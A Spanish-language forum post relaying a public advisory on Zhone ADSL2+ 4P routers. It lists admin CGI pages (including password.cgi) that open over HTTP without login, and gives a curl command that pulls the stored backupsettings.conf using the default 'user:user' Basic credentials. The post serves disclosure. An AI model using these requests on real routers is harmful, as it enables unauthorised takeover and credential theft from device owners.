Obtención de privilegios roots en Zhone ADSL2+ 4P (Pagina 1) / Otras marcas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 05-09-2015 11:10:11

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,283

Obtención de privilegios roots en Zhone ADSL2+ 4P

Obtención de privilegios de administrador en la gama  Zhone ADSL2+ 4P

  No conocía a la marca Zhone.

zhone2.jpg

Tienen una pequeña serie de CPE : products
Estos routers sufren de una grave enfermedad: además de tener una pinta que espanta hasta sus propias  madres;  son iguales de seguros que un router thomson ( cf Obtener los credenciales de administrador de un Thomson TWG850) big_smile
  Es lo que demuestra hoy Mahmoud Khaled en vunerabiltylab.
  La información fue también puesta en packet storm:

¿Quieres ser root?
  1. Puedes acceder a estas tres paginas mediante http sin conocer los credenciales

    http://[LOCALHOST]:?/pvccfg.cgi
    http://[LOCALHOST]:?/dnscfg.cgi
    http://[LOCALHOST]:?/password.cgi  (In addition to text storage of sensitive information!)
  2. En localhost pones la pasarela y si vas por ejemplo a password.cgi puedes conocer or re-configurar el nombre y la contraseña de administrador. 
    Puedes obtener los parámetros guardados en el fichero backupsettings.conf. gracias una simple petición con curl.

    curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" 

    ( ("dXNlcjp1c2Vy" = "user:user" en base64))

Un tipo de brecha ya vistas en le pasado y que no deberíamos encontrar en una serie moderna de puntos de acceso.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
14 580 Hoy 00:13:35 por dymusya
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 8 ]
195 6900 Ayer 17:51:22 por kcdtv
0 36 Ayer 13:53:13 por Koala
Rompiendo WPA2 ? (KRACK) por markspitz15
1 230 16-10-2017 19:19:20 por kcdtv
1 42 16-10-2017 18:37:37 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: pagonal
Usuarios registrados conectados: 0
Invitados conectados: 17

Estadisticas de los foros

Número total de usuarios registrados: 715
Número total de temas: 875
Número total de mensajes: 7,449

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21